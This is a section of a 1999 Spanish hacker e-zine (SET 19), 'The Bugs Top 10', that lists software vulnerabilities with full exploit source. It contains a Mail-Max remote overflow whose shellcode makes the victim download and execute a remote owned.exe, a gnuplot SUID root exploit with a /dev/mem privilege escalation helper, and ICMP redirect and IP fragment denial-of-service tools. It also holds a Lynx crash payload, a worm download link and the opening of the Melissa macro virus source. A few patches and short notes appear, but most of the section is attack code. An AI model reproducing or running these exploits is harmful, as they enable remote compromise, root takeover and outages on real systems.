TOP
AutoresTOTAL
LecturasSET 19
175716 visitas
- Contenidos - SET Staff
- Editorial - Editor
- Noticias - Rufus T. Firefly
- En linea con... Merce Molist - Hendrix
- Bazar de SET - Varios Autores
- Fuentes en C de los algoritmos A3 y A8 de GSM (Bazar) - Varios autores
- Salvapantallas de Windows y sus claves (Bazar) - Bacterio
- Hackear la TV (Bazar) - Hendrix
- Introduccion a Shiva (Bazar) - Madfran
- Infovia Plus: Nivel Usuario Impertinente (Bazar) - Maikel
- Phreak en la Republica Checa (Bazar) - GND
- Phreak en Alemania (Bazar) - GND
- PBX (Bazar) - Hendrix
- Mente Artificial (Bazar) - Cyclops
- WinGate (Bazar) - BiT^BaNG
- Reflexiones sobre un joven rebelde (Bazar) - Alomejor
- (d)EFECTO 2000 (Bazar) - Garrulo
- BookMarks - SET Staff
- Trucos - SET Staff
- FreeCad v1.0 - +NetBul
- Hacking PlayStation - GND
- Proyectos, peticiones, avisos - SET Staff
- Radio paquete - Qua$ar
- The Bugs Top 10 - SET Staff
- The modem connection - Paseante
- SET Inbox - SET Staff
- Cracking bajo Linux III - SiuL+Hacky
- IP Hijacking v0.1 - Inetd
- Curso de Novell Netware XI, XII y XIII - Madfran
- Shell Scripting - UnderCode
- Historia electronica - GND
- Protocolo SET - Hendrix
- Tu amigo el disco duro - Chessy
- Jugando con tarjetas inteligentes - GND
- V.I.R.U.S. - Garrulo & HackerMatter
- Fuentes Extract - SET Staff
- Llaves PGP - SET Staff
The Bugs Top 10
Autor: SET Staff
-[ 0x09 ]-------------------------------------------------------------------- -[ THE BUGS TOP 10 ]--------------------------------------------------------- -[ by SET Staff ]-----------------------------------------------------SET-19- -( 0x01 )- Para : Windows NT Tema : Cuelgue total Patch : XDDDD Creditos : Ingenius - Mensaje enviado por Zaldivar Descripcion y Notas: -----Mensaje original----- De: Ingenius N.N. Bien paso a explicar 1 - Abra un ventata de dos 2 - Precione la tacla TAB hasta que desaparesca todo lo que halla en la pantalla o hasta que haga ruido de que no da para mas. 3 - Precione la tecla Backspace hasta que cuelge si no cuelta despues de un rato no cuelga y uds a tenido apretada la tecla Backspace, sueltela y preciones la tecla ENTER y listo pantalla azul de aquellas Esto lo probe con NT Workstation 4.0 con SP3, seguro que con Server tiene que andar Saludos Ingenius N.N. -( 0x02 )- Para : Mail-Max SMTP Server for Windows 95/98/NT Tema : Acceso no autorizado Patch : No Microsoft, No problem Creditos : _mcp_ <++> set_019/exploits/mmax.c #include <stdio.h> #include <unistd.h> #include <fcntl.h> #include <netdb.h> #include <netinet/in.h> #include <sys/socket.h> #include <arpa/inet.h> /* Mail-Max Remote Exploit by _mcp_ <pw@nacs.net> This program must be run under x86 Linux Greets go out to: Morpheus, Killspree, Coolg, Dregvant, Vio, Wrl, #finite, #win32asm and anyone I may have missed, you know who you are :). You can reach me on efnet. No greets go out to etl. */ char code[] = "\xEB\x45\xEB\x20\x5B\xFC\x33\xC9\xB1\x82\x8B\xF3\x80\x2B\x1" "\x43\xE2\xFA\x8B\xFB\xE8\xE9\xFF\xFF\xFF\xE8\xE4\xFF\xFF\xFF" "\xEB\x29\x46\x58\xFF\xE0\xBB\x40\xA5\x1\x10\x56\xFF\x13\x8B" "\xE8\x46\x33\xC0\x3A\x6\x75\xF9\x46\x40\x3A\x6\x74\xE5\x56" "\x55\xBB\x54\xA5\x1\x10\xFF\x13\xAB\xEB\xE7\xEB\x4F\x33\xC9" "\x66\x49\xC1\xC1\x2\x51\x33\xC0\x51\x50\xFF\x57\xE8\x8B\xE8" "\x33\xC9\x51\x51\x51\x51\x57\xFF\x57\xF4\x33\xC9\x51\x51\x51" "\x51\x56\x50\xFF\x57\xF8\x59\x57\x51\x55\x50\xFF\x57\xFC\x83" "\xC6\x7\x33\xC9\x51\x56\xFF\x57\xDC\xFF\x37\x55\x50\x8B\xE8" "\xFF\x57\xE0\x55\xFF\x57\xE4\x33\xC9\x51\x56\xFF\x57\xEC\xFF" "\x57\xF0\xE8\x67\xFF\xFF\xFF\x4C\x46\x53\x4F\x46\x4D\x34\x33" "\x1\x60\x6D\x64\x73\x66\x62\x75\x1\x60\x6D\x78\x73\x6A\x75" "\x66\x1\x60\x6D\x64\x6D\x70\x74\x66\x1\x48\x6D\x70\x63\x62" "\x6D\x42\x6D\x6D\x70\x64\x1\x58\x6A\x6F\x46\x79\x66\x64\x1" "\x46\x79\x6A\x75\x51\x73\x70\x64\x66\x74\x74\x1\x2\x58\x4A" "\x4F\x4A\x4F\x46\x55\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50" "\x71\x66\x6F\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75\x50\x71" "\x66\x6F\x56\x73\x6D\x42\x1\x4A\x6F\x75\x66\x73\x6F\x66\x75" "\x53\x66\x62\x65\x47\x6A\x6D\x66\x1\x2\x69\x75\x75\x71\x3B" "\x30\x30\x00"; /*This is the encrypted /~pw/owned.exe we paste at the end */ char dir[] = "\x30\x7f\x71\x78\x30\x70\x78\x6f\x66\x65\x2F\x66\x79\x66\x1\x0"; unsigned int getip(char *hostname) { struct hostent *hostinfo; unsigned int binip; hostinfo = gethostbyname(hostname); if(!hostinfo) { printf("cant find: %s\n",hostname); exit(0); } bcopy(hostinfo -> h_addr, (char *)&binip, hostinfo -> h_length); return(binip); } int usages(char *fname) { printf("Remote Mail-Max exploit v1.0 by _mcp_ <pw@nacs.net>.\n"); printf("Usages: \n"); printf("%s <target host> <http site> <offset> <return address>\n", fname); printf("All known versions offset = 539, Return address = 79887315\n"); printf("Will make target download, save, and execute http://<http site>/~pw/owned.exe\n"); exit(0); } main (int argc, char *argv[]) { int sock,filedesc,offset,targethost,sinlen,codelength; struct sockaddr_in sin; unsigned char buffer[8000]; char ipbuffer[16]; unsigned char *ptr,*ptr2; unsigned long ret_addr; int len,x = 1; unsigned long address; if (argc < 5) usages(argv[0]); targethost = getip(argv[1]); len = strlen(argv[2]); if (len > 60) { printf("Bad http format!\n"); usages(argv[0]); } ptr = argv[2]; while (x <= len) { x++; (*ptr)++; /*Encrypt the http ip for later parsing */ ptr++; } offset = atoi(argv[3]); ret_addr = atol(argv[4]); if (offset > 7000) { printf("Offset too large.\n"); exit(0); } sock = socket(AF_INET,SOCK_STREAM,0); sin.sin_family = AF_INET; sin.sin_addr.s_addr = targethost; sin.sin_port = htons(25); sinlen = sizeof(sin); printf("Starting to create the egg\n"); ptr = (char *)&buffer; strcpy(ptr,"HELO "); ptr+=5; memset((void *)ptr, 0x90, 7000); ptr+=offset; memcpy ((void *) ptr,(void *)&ret_addr, 4); ptr+=60; memcpy((void *) ptr,(void *)&code,strlen(code)); (char *) ptr2 = strstr(ptr,"\xb1"); if (ptr2 == NULL) { printf("Bad shell code\n"); exit(0); } ptr2++; (*ptr2)+= len + ( sizeof(dir) - 1 ); (char *) ptr2 = strstr(ptr,"\x83\xc6"); if (ptr2 == NULL) { printf("Bad shell code\n"); exit(0); } ptr2+= 2; (*ptr2)+= len + 8; ptr+=strlen(code); memcpy((void *) ptr, (void *) argv[2], len); /*Parse in the http site's info */ ptr+=len; memcpy((void *) ptr,(void*) &dir, sizeof(dir) ); printf("Made the egg\n"); if ( connect(sock, (struct sockaddr *)&sin, sinlen) == -1) { perror("error:"); exit(0); } printf("Connected.\n"); write(sock, &buffer, strlen((char *)&buffer) ); write(sock,"\r\n",2); sleep(1); printf("Sent the egg\n"); close(sock); exit(1); } <--> Descripcion y Notas: Volvemos a las historias de siempre, a los desbordamientos. Parece que los programadores no aprenden nunca, e incluso cada dia llegan a cometer errores aun mas grandes. No es que a ningun programador no se le pueda colar un desbordamiento en su programa. Esto es habitual, sobre todo si se trabaja en C y se tiene poca experiencia. El problema surge en situaciones como la que tiene Mail-Max. Resulta que no solo produce un desbordamiento, sino que ademas, ese codigo que incluyamos por encima de la pila puede ser ejecutable, pues segun unas determinadas circunstancias, este codigo se ejecutara. Ver para creer. -( 0x03 )- Para : Frontapge 98 & Apache 1.3.4 Tema : Tonteria Patch : Si es que frontpage... Creditos : Sitzkrieg Redundus Descripcion y Notas: Un error de los tontos. Aparentemente no se le saca provecho, pero es una curiosidad que merece la pena comentar. Resulta que al configurar el Apache 1.3.4 para que soporte las extensiones de FrontPage 98, y lanzar el httpd, se produce un error de lo mas curioso. El error proporcionado es ni mas ni menos que un error de sintaxis en la linea 1 del fichero /dev/null. Ya veis, ahora le da por jugar con los dispositivos, y no contento con eso, crea un /dev/null.bak... Alucinante. -( 0x04 )- Para : GNU Plot 3.5 Tema : SUID root Patch : quizas mas abajo Creditos : xnec / Nergal <++> set_019/exploits/xnec_plot.c /* gnuplot Linux x86 exploit from xnec tested on gnuplot Linux version 3.5 (pre 3.6) patchlevel beta 336/SuSE 5.2 gnuplot ships suidroot by default in SuSE 5.2, maybe others gcc -o xnec_plot xnec_plot.c ./xnec_plot <bufsiz> <offset> The buffer we're overflowing is only 80 bytes, so we're going to have to get our settings just so. If you don't feel like typing in command line offsets and bufsizes, make a little shell script: --- #! /bin/bash bufsiz=110 offset=0 while [ $offset -lt 500 ]; do ./xnec_plot $bufsiz $offset offset=`expr $offset + 10` done --- since gnuplot drops root privs after it inits your svga, we can't just exec /bin/sh, we'll need to use the technique of replacing our saved uid in /dev/mem with '0', then execing whatever we please. We do this by compiling Nergal's program, mem.c and putting the output file in /tmp/xp, as in gcc -o /tmp/xp mem.c. Nergal's program will then make /tmp/sh suidroot, so don't forget to cp /bin/sh /tmp/sh. You will also have to change line 32 to the correct address of kstat, which can be obtained by doing strings /proc/ksyms | grep kstat. Since I can see absolutely no reason for gnuplot to be suidroot, the best fix is chmod -s /usr/bin/gnuplot. greets to #sk1llz, xnec on EFnet and DALnet */ #include <stdlib.h> #define DEFAULT_OFFSET 50 #define DEFAULT_BUFSIZ 110 #define NOP 0x90 #define DEFAULT_ADDR 0xbffff81c /* Aleph One's shellcode, modified to run our own program */ char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/tmp/xp"; unsigned long getsp(void) { __asm__("movl %esp,%eax"); } void main(int argc, char *argv[]) { char *buf, *ret; long *addrp, addr; int bufsiz, offset; int i; bufsiz=DEFAULT_BUFSIZ; offset=DEFAULT_OFFSET; if (argc = 2) bufsiz = atoi(argv[1]); if (argc = 3) offset = atoi(argv[2]); buf=malloc(bufsiz); addr = getsp() - offset; printf("address: 0x%x\n", addr); printf("bufsize: %d\n", bufsiz); printf("offset : %d\n", offset); ret = buf; addrp = (long *) ret; for (i = 0; i < bufsiz; i+=4) *(addrp++) = addr; memset(buf, NOP, (strlen(shellcode)/2)); ret = buf + ((bufsiz/2) - (strlen(shellcode)/2)); for (i = 0; i < strlen(shellcode); i++) *(ret++) = shellcode[i]; buf[bufsiz - 1] = '\0'; memcpy(buf,"HOME=", 5); setenv("HOME", buf, 1); execvp("/usr/bin/gnuplot", NULL); } <--> <++> set_019/exploits/mem.c /* by Nergal */ #define SEEK_SET 0 #define __KERNEL__ #include <linux/sched.h> #undef __KERNEL__ #define SIZEOF sizeof(struct task_struct) int mem_fd; int mypid; void testtask (unsigned int mem_offset) { struct task_struct some_task; int uid, pid; lseek (mem_fd, mem_offset, SEEK_SET); read (mem_fd, &some_task, SIZEOF); if (some_task.pid == mypid) /* is it our task_struct ? */ { some_task.euid = 0; some_task.fsuid = 0; /* needed for chown */ lseek (mem_fd, mem_offset, SEEK_SET); write (mem_fd, &some_task, SIZEOF); /* from now on, there is no law beyond do what thou wilt */ chown ("/tmp/sh", 0, 0); chmod ("/tmp/sh", 04755); exit (0); } } #define KSTAT 0x001a8fb8 /* <-- replace this addr with that of your kstat */ main () /* by doing strings /proc/ksyms |grep kstat */ { unsigned int i; struct task_struct *task[NR_TASKS]; unsigned int task_addr = KSTAT - NR_TASKS * 4; mem_fd = 3; /* presumed to be opened /dev/mem */ mypid = getpid (); lseek (mem_fd, task_addr, SEEK_SET); read (mem_fd, task, NR_TASKS * 4); for (i = 0; i < NR_TASKS; i++) if (task[i]) testtask ((unsigned int)(task[i])); } <--> <++> set_019/patches/gnuplot --- plot.c.old Fri Mar 5 03:17:59 1999 +++ plot.c Fri Mar 5 03:29:19 1999 @@ -516,7 +516,7 @@ char c='\0';/* character that should be added, or \0, if none */ if(tmp_home) { - strcpy(home,tmp_home); + strncpy(home,tmp_home,(sizeof(home) - 1)); if( strlen(home) ) p = &home[strlen(home)-1]; else p = home; #if defined(MSDOS) || defined(ATARI) || defined( OS2 ) || defined(_Windows) || defined(DOS386) <--> Descripcion y Notas: El error es un simple buffer overflow, de los de toda la vida. El problema surge cuando el programa se instala con SUID root por defecto, en distribuciones como la SuSe 5.2, por ejemplo. En estas circunstancias, despues de producirse el desbordamiento, se obtienen permisos de root. Toda una ganga que podemos evitar con el patch suministrado ;) Es conveniente comprobarlo, pues en distribuciones como Slackware o Debian parece que se instala correctamente, evitando el problema mencionado. Otra forma de solventar el problema en SuSe, que al parecer se trata de la unica distribucion afectada (eso si, en una version antigua), es modificar el fichero /etc/rc.config, de forma que la variable PERMISSION_SECURITY se establezca en "paranoid". -( 0x05 )- Para : Windows {95,98,NT} Tema : Congelar el sistema operativo Patch : Es bueno y es gratis... es... LINUX Creditos : Delmore <++> set_019/exploits/winfreez.c /* WinFreez.c by Delmore <delmore@moscowmail.com> ICMP/Redirect-host message storm freeze Win9x/NT(sp4) box in LAN. Usage: winfreez sendtoip sendfromip time where <sendtoip> is victim host, <sendfromip> is router for victim host, <time> is time in seconds to freeze victim. Note: I've written small exploit for freeze win9x/nt boxes in LAN. Proggy initiates ICMP/Redirect-host messages storm from router (use router ip). Windows will receive redirect-host messages and change own route table, therefore it will be frozen or slowly working during this time. On victim machine route table changes viewing with: ROUTE PRINT command in ms-dos box. Exploit show different result for different system configuration. System results: p200/16ram/win95osr2 is slowly execute application after 20 seconds of storm. p233/96ram/nt4-sp4 is slowly working after 30 seconds of storm. p2-266/64ram/win95 working slowly and can't normal execute application. Compiled on RedHat Linux 5, Kernel 2.0.35 (x86) gcc ./winfreez.c -o winfreez --- for Slackware Linux, Kernel 2.0.30 If you can't compile due to ip_sum not defined errors, replace (line 207): ip->ip_sum = 0; to line: ip->ip_csum = 0; --- Soldiers Of Satan group Russia, Moscow State University, 05 march 1999 http://sos.nanko.ru Thanx to Mark Henderson. */ #include <stdio.h> #include <stdlib.h> #include <time.h> #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> /* * Structure of an icmp header (from sparc header). */ struct icmp { u_char icmp_type; /* type of message, see below */ u_char icmp_code; /* type sub code */ u_short icmp_cksum; /* ones complement cksum of struct */ union { u_char ih_pptr; /* ICMP_PARAMPROB */ struct in_addr ih_gwaddr; /* ICMP_REDIRECT */ struct ih_idseq { n_short icd_id; n_short icd_seq; } ih_idseq; int ih_void; } icmp_hun; #define icmp_pptr icmp_hun.ih_pptr #define icmp_gwaddr icmp_hun.ih_gwaddr #define icmp_id icmp_hun.ih_idseq.icd_id #define icmp_seq icmp_hun.ih_idseq.icd_seq #define icmp_void icmp_hun.ih_void union { struct id_ts { n_time its_otime; n_time its_rtime; n_time its_ttime; } id_ts; struct id_ip { struct ip idi_ip; /* options and then 64 bits of data */ } id_ip; u_long id_mask; char id_data[1]; } icmp_dun; #define icmp_otime icmp_dun.id_ts.its_otime #define icmp_rtime icmp_dun.id_ts.its_rtime #define icmp_ttime icmp_dun.id_ts.its_ttime #define icmp_ip icmp_dun.id_ip.idi_ip #define icmp_mask icmp_dun.id_mask #define icmp_data icmp_dun.id_data }; u_short in_cksum (u_short *addr, int len); void attack( char *sendtoip, char *sendfromip, time_t wtime, int s ); void main (int argc, char **argv) { time_t wtime; char *sendtoip, *sendfromip; int s, on; if (argc != 4) { fprintf (stderr, "usage: %s sendto sendfrom time\n", argv[0]); exit (1); } sendtoip = (char *)malloc(strlen(argv[1]) + 1); strcpy(sendtoip, argv[1]); sendfromip = (char *)malloc(strlen(argv[2]) + 1); strcpy(sendfromip, argv[2]); wtime = atol(argv[3]); if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { fprintf (stderr, "socket creation error\n" ); exit (1); } #ifdef IP_HDRINCL if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, &on, sizeof (on)) < 0) { fprintf (stderr, "sockopt IP_HDRINCL error\n" ); exit (1); } #endif printf("winfreez by Delmore, <delmore@moscowmail.com>\n"); printf("Soldiers Of Satan group, http://sos.nanko.ru\n\n"); printf("sendto = %s\n", sendtoip); printf("sendfrom = %s\n", sendfromip); printf("time = %i s\n", wtime); attack( sendtoip, sendfromip, wtime, s ); free( (void *) sendtoip ); free( (void *) sendfromip ); } void attack( char *sendtoip, char *sendfromip, time_t wtime, int s ) { time_t curtime, endtime; int i1, i2, i3, i4; char redir[21]; char buf[100]; struct ip *ip = (struct ip *) buf; struct icmp *icmp = (struct icmp *) (ip + 1); struct hostent *hp; struct sockaddr_in dst; if(wtime==0) return; if ((hp = gethostbyname (sendtoip)) == NULL) if ((ip->ip_dst.s_addr = inet_addr (sendtoip)) == -1) { fprintf (stderr, "%s: unknown sendto\n", sendtoip); exit (1); } if ((hp = gethostbyname (sendfromip)) == NULL) if ((ip->ip_src.s_addr = inet_addr (sendfromip)) == -1) { fprintf (stderr, "%s: unknown sendfrom\n", sendfromip); exit (1); } endtime = time(NULL) + wtime; srand((unsigned int) endtime); do { bzero (buf, sizeof buf); /* sendto/gateway */ hp = gethostbyname (sendtoip); bcopy (hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length); bcopy (hp->h_addr_list[0], &icmp->icmp_gwaddr.s_addr, hp->h_length); /* sendfrom */ hp = gethostbyname (sendfromip); bcopy (hp->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length); /* generate redirect*/ i1 = 1+(int) (223.0*rand()/(RAND_MAX+1.0)); i2 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); i3 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); i4 = 1+(int) (253.0*rand()/(RAND_MAX+1.0)); bzero (redir, sizeof redir); sprintf(redir,"%u.%u.%u.%u", i4, i3, i2, i1 ); hp = gethostbyname (redir); bcopy (hp->h_addr_list[0], &icmp->icmp_ip.ip_dst.s_addr, hp->h_length); ip->ip_v = 4; ip->ip_hl = sizeof *ip >> 2; ip->ip_tos = 0; ip->ip_len = htons (sizeof buf); ip->ip_id = htons (4321); ip->ip_off = 0; ip->ip_ttl = 255; ip->ip_p = 1; ip->ip_sum = 0; /* kernel fills this in */ bcopy (&ip->ip_dst.s_addr, &icmp->icmp_ip.ip_src.s_addr, sizeof (ip->ip_dst.s_addr)); icmp->icmp_ip.ip_v = 4; icmp->icmp_ip.ip_hl = sizeof *ip >> 2; icmp->icmp_ip.ip_tos = 0; icmp->icmp_ip.ip_len = htons (100); /* doesn't matter much */ icmp->icmp_ip.ip_id = htons (3722); icmp->icmp_ip.ip_off = 0; icmp->icmp_ip.ip_ttl = 254; icmp->icmp_ip.ip_p = 1; icmp->icmp_ip.ip_sum = in_cksum ((u_short *) & icmp->icmp_ip, sizeof *ip); dst.sin_addr = ip->ip_dst; dst.sin_family = AF_INET; icmp->icmp_type = ICMP_REDIRECT; icmp->icmp_code = 1; /* 1 - redirect host, 0 - redirect net */ icmp->icmp_cksum = in_cksum ((u_short *) icmp, sizeof (buf) - sizeof (*ip)); if( sendto( s, buf, sizeof buf, 0, (struct sockaddr *) &dst, sizeof dst) < 0 ) { fprintf (stderr, "sendto error\n"); exit (1); } }while (time(NULL)!=endtime); } /* * in_cksum -- Checksum routine for Internet Protocol family headers (C * Version) - code from 4.4 BSD */ u_short in_cksum (u_short *addr, int len) { register int nleft = len; register u_short *w = addr; register int sum = 0; u_short answer = 0; /* * Our algorithm is simple, using a 32 bit accumulator (sum), we add * sequential 16 bit words to it, and at the end, fold back all the * carry bits from the top 16 bits into the lower 16 bits. */ while (nleft > 1) { sum += *w++; nleft -= 2; } /* mop up an odd byte, if necessary */ if (nleft == 1) { *(u_char *) (&answer) = *(u_char *) w; sum += answer; } /* add back carry outs from top 16 bits to low 16 bits */ sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */ sum += (sum >> 16); /* add carry */ answer = ~sum; /* truncate to 16 bits */ return (answer); } <--> Descripcion y Notas: No, no se trata de mantener bien conservado y fresco a Windows para que llegue con salud al a~o 2.000. Bien, para que esto funcione, la maquina con Windows debe estar conectada a una LAN. El programa envia una rafaga de paquetes ICMP redirect-host (tipo 5, codigo 1). Windows, al recibir estos paquetes, cambia su tabla de enrutamiento, quedandose parcial o totalmente congelado durante este proceso. En algunas ocasiones tarda un poco en mostrar resultados, pero funciona perfectamente, incluso con el ultimo Service Pack (el 4), para Windows NT. Una ultima aclaracion. Las direcciones suministradas por los paquetes ICMP redirect-host son aleatorias, siendo esta parte de la causa del efecto. -( 0x06 )- Para : Lynx 2.8 Tema : Overflow Patch : Una version mas reciente, o un telnet directamente Creditos : Este lo envio... Mixter Descripcion y Notas: Pues como siempre, se olvidaron los programadores de comprobar que una variable no execediese de tama~o, en la funcion strrchr() Una forma de explotarlo es con el siguiente codigo HTML: <img width=00000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000001> FAILED<br><br> Y al parecer, tambien cuela en el Internet Explorer. Esto es compenetracion. -( 0x07 )- Para : Linux 2.1.89 & 2.2.3 Tema : Perdida de la conectividad IP Patch : Mas abajo, o un nuevo kernel Creditos : John McDonald <++> set_019/exploits/sesquipedalian.c /* * sesquipedalian.c - Demonstrates a DoS bug in Linux 2.1.89 - 2.2.3 * * by horizon <jmcdonal@unf.edu> * * This sends a series of IP fragments such that a 0 length fragment is first * in the fragment list. This causes a reference count on the cached routing * information for that packet's originator to be incremented one extra time. * This makes it impossible for the kernel to deallocate the destination entry * and remove it from the cache. * * If we send enough fragments such that there are at least 4096 stranded * dst cache entries, then the target machine will no longer be able to * allocate new cache entries, and IP communication will be effectively * disabled. You will need to set the delay such that packets are not being * dropped, and you will probably need to let the program run for a few * minutes to have the full effect. This was written for OpenBSD and Linux. * * Thanks to vacuum, colonwq, duke, rclocal, sygma, and antilove for testing. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <netinet/in.h> #include <sys/socket.h> #include <netdb.h> #include <arpa/inet.h> struct my_ip_header { unsigned char ip_hl:4, /* header length */ ip_v:4; /* version */ unsigned char ip_tos; /* type of service */ unsigned short ip_len; /* total length */ unsigned short ip_id; /* identification */ unsigned short ip_off; /* fragment offset field */ #define IP_RF 0x8000 /* reserved fragment flag */ #define IP_DF 0x4000 /* dont fragment flag */ #define IP_MF 0x2000 /* more fragments flag */ #define IP_OFFMASK 0x1fff /* mask for fragmenting bits */ unsigned char ip_ttl; /* time to live */ unsigned char ip_p; /* protocol */ unsigned short ip_sum; /* checksum */ unsigned long ip_src, ip_dst; /* source and dest address */ }; struct my_udp_header { unsigned short uh_sport; unsigned short uh_dport; unsigned short uh_ulen; unsigned short uh_sum; }; #define IHLEN (sizeof (struct my_ip_header)) #define UHLEN (sizeof (struct my_udp_header)) #ifdef __OpenBSD__ #define EXTRA 8 #else #define EXTRA 0 #endif unsigned short checksum(unsigned short *data,unsigned short length) { register long value; u_short i; for(i=0;i<(length>>1);i++) value+=data[i]; if((length&1)==1) value+=(data[i]<<8); value=(value&65535)+(value>>16); return(~value); } unsigned long resolve( char *hostname) { long result; struct hostent *hp; if ((result=inet_addr(hostname))==-1) { if ((hp=gethostbyname(hostname))==0) { fprintf(stderr,"Can't resolve target.\n"); exit(1); } bcopy(hp->h_addr,&result,4); } return result; } void usage(void) { fprintf(stderr,"usage: ./sqpd [-s sport] [-d dport] [-n count] [-u delay] source target\n"); exit(0); } void sendem(int s, unsigned long source, unsigned long dest, unsigned short sport, unsigned short dport) { static char buffer[8192]; struct my_ip_header *ip; struct my_udp_header *udp; struct sockaddr_in sa; bzero(&sa,sizeof(struct sockaddr_in)); sa.sin_family=AF_INET; sa.sin_port=htons(sport); sa.sin_addr.s_addr=dest; bzero(buffer,IHLEN+32); ip=(struct my_ip_header *)buffer; udp=(struct my_udp_header *)&(buffer[IHLEN]); ip->ip_v = 4; ip->ip_hl = IHLEN >>2; ip->ip_tos = 0; ip->ip_id = htons(random() & 0xFFFF); ip->ip_ttl = 142; ip->ip_p = IPPROTO_UDP; ip->ip_src = source; ip->ip_dst = dest; udp->uh_sport = htons(sport); udp->uh_dport = htons(dport); udp->uh_ulen = htons(64-UHLEN); udp->uh_sum = 0; /* Our first fragment will have an offset of 0, and be 32 bytes long. This gets added as the only element in the fragment list. */ ip->ip_len = htons(IHLEN+32); ip->ip_off = htons(IP_MF); ip->ip_sum = 0; ip->ip_sum = checksum((u_short *)buffer,IHLEN+32); if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0) { perror("sendto"); exit(1); } /* Our second fragment will have an offset of 0, and a 0 length. This gets added to the list before our previous fragment, making it first in line. */ ip->ip_len = htons(IHLEN); ip->ip_off = htons(IP_MF); ip->ip_sum = 0; ip->ip_sum = checksum((u_short *)buffer,IHLEN); if (sendto(s,buffer,IHLEN+EXTRA,0,(struct sockaddr*)&sa,sizeof(sa)) < 0) { perror("sendto"); exit(1); } /* Our third and final frag has an offset of 4 (32 bytes), and a length of 32 bytes. This passes our three frags up to ip_glue. */ ip->ip_len = htons(IHLEN+32); ip->ip_off = htons(32/8); ip->ip_sum = 0; ip->ip_sum = checksum((u_short *)buffer,IHLEN+32); if (sendto(s,buffer,IHLEN+32,0,(struct sockaddr*)&sa,sizeof(sa)) < 0) { perror("sendto"); exit(1); } } int main(int argc, char **argv) { int sock; int on=1,i; unsigned long source, dest; unsigned short sport=53, dport=16384; int delay=20000, count=15000; if (argc<3) usage(); while ((i=getopt(argc,argv,"s:d:n:u:"))!=-1) { switch (i) { case 's': sport=atoi(optarg); break; case 'd': dport=atoi(optarg); break; case 'n': count=atoi(optarg); break; case 'u': delay=atoi(optarg); break; default: usage(); } } argc-=optind; argv+=optind; source=resolve(argv[0]); dest=resolve(argv[1]); srandom(time((time_t)0)*getpid()); if( (sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("socket"); exit(1); } if (setsockopt(sock,IPPROTO_IP,IP_HDRINCL,(char *)&on,sizeof(on)) < 0) { perror("setsockopt: IP_HDRINCL"); exit(1); } fprintf(stdout,"\nStarting attack on %s ...",argv[1]); for (i=0; i<count; i++) { sendem(sock,source+htonl(i),dest,sport,dport); if (!(i%2)) usleep(delay); if (!(i%100)) { if (!(i%2000)) fprintf(stdout,"\n"); fprintf(stdout,"."); fflush(stdout); } } fprintf(stdout,"\nDone.\n"); exit(1); } <--> <++> set_019/patches/sesquipedalian --- linux-2.2.3/net/ipv4/ip_fragment.c Wed Mar 24 22:48:26 1999 +++ linux/net/ipv4/ip_fragment.c Wed Mar 24 22:44:24 1999 @@ -17,6 +17,7 @@ * xxxx : Overlapfrag bug. * Ultima : ip_expire() kernel panic. * Bill Hawes : Frag accounting and evictor fixes. + * John McDonald : 0 length frag bug. */ #include <linux/types.h> @@ -357,7 +358,7 @@ fp = qp->fragments; count = qp->ihlen; while(fp) { - if ((fp->len < 0) || ((count + fp->len) > skb->len)) + if ((fp->len <= 0) || ((count + fp->len) > skb->len)) goto out_invalid; memcpy((ptr + fp->offset), fp->ptr, fp->len); if (count == qp->ihlen) { <--> Descripcion y Notas: En esta ocasion nos encontramos con un error en el tratamiento de los datagramas IP. Que es lo que sucede? Pues que cuando se tiene que gestionar un fragmento de longitud 0, y da la casualidad de que este fragmento es el primero, generaremos una cantidad de basura en la memoria que no sera eliminada, siendo esta nuestra puerta a bloquear la conectividad de la maquina -( 0x08 )- Para : X11R6 - BSD Tema : Acceso root en ciertas condiciones Patch : Uhmm! Creditos : telnetd Descripcion y Notas: Bien la historia se produce por un error con la gestion de permisos del X11R6. Resulta que si, por ejemplo, hacemos un enlace simbolico al directorio /root en /tmp/.X11-unix, y lanzamos las X con startx como toda la vida, obtendremos permisos de escritura en el directorio /root. Y eso, con cualquier directorio al que le tengamos denegado el acceso. Eso si, los permisos son para la creacion de nuevos ficheros, no pudiendo modificar los existentes. Parece que esta afectada toda la familia BSD, y algunas lenguas comentan que tambien sucede en Linux. Solo que en este caso no nos ha funcionado. -( 0x09 )- Para : Linux, especialmente RedHat Tema : Gusanito que te crio Patch : ... Creditos : ADM Descripcion y Notas: Si hay algo que ha causado un revuelo estos ultimos dias ha sido la aparicion de este gusano para Linux, especialmente RedHat 5.2. Este gusano es una maravilla, e incluye una importante base de datos de las vulnerabilidades de un sistema Linux. De esta forma consigue infiltrarse en el sistema, y realiza un chequeo de todos los servicios, puertos y programas susceptibles de tener un bug aprovechable. Lo mas curioso es el misticismo que se ha creado en torno a el, cuando las fuentes estan disponibles publicamente en: ---[ http://adm.isp.at/ADM/ADMw0rm-v1.tar -( 0x0A )- Para : WINDOWS !!! Tema : Propagacion de virus Patch : Las neuronas suelen evitar estos casos Creditos : Kwyjibo <++> set_019/exploits/melissa Private Sub Document_Open() On Error Resume Next If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", 